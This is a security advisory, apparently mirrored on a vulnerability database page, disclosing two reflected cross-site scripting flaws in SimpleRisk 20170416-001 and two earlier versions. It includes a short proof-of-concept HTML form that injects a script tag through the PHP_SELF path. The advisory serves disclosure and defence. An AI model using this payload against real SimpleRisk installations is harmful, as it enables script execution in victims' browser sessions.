SimpleRisk v20170416-001 Reflected XSS Vulnerabilities

🗓️ 21 Jun 2017 00:00:00Reported by Gjoko KrsticHigh five to Josh!Type

zeroscience🔗 www.zeroscience.mk👁 62 Views

SimpleRisk v20170416-001 Reflected XSS Vulnerabilities, impacting versions 20170416-001, 20170108-001, and 20170102-001. Allows execution of arbitrary HTML and script code in user's browser session

<!--

SimpleRisk v20170416-001 Reflected XSS Vulnerabilities


Vendor: SimpleRisk, LLC
Product web page: https://www.simplerisk.com
Affected version: 20170416-001
                  20170108-001
                  20170102-001

Summary: SimpleRisk is an open-source risk management system released
under Mozilla Public License and used for risk management activities.
It enables risk managers to account for risks, plan mitigation measures,
facilitate management reviews, prioritize for project planning, and track
periodic reviews.

Desc: SimpleRisk suffers from two reflected cross-site scripting vulnerabilities
when input passed via 'draw' POST parameter and the 'PHP_SELF' variable is not
properly sanitized before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in context of
an affected site.

Tested on: PHP/5.5.9-1ubuntu4.20
           Apache/2.4.7 (Ubuntu)
           MySQL 14.14 (Distrib 5.5.53 for debian-linux-gnu)
           Ubuntu 14.04.5 LTS


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5414
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5414.php


05.06.2017

--><html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.1.72/management/plan_mitigations.php/'&gt;&lt;script&gt;alert(1)&lt;/script&gt;">
<input name="currentpage" type="hidden" value="/ZSL"/>
<input type="submit" value="XSS #1"/>
</form>
</body>
</html><html><p>

=====

</p></html>

21 Jun 2017 00:00Current

6Medium risk

Vulners AI Score6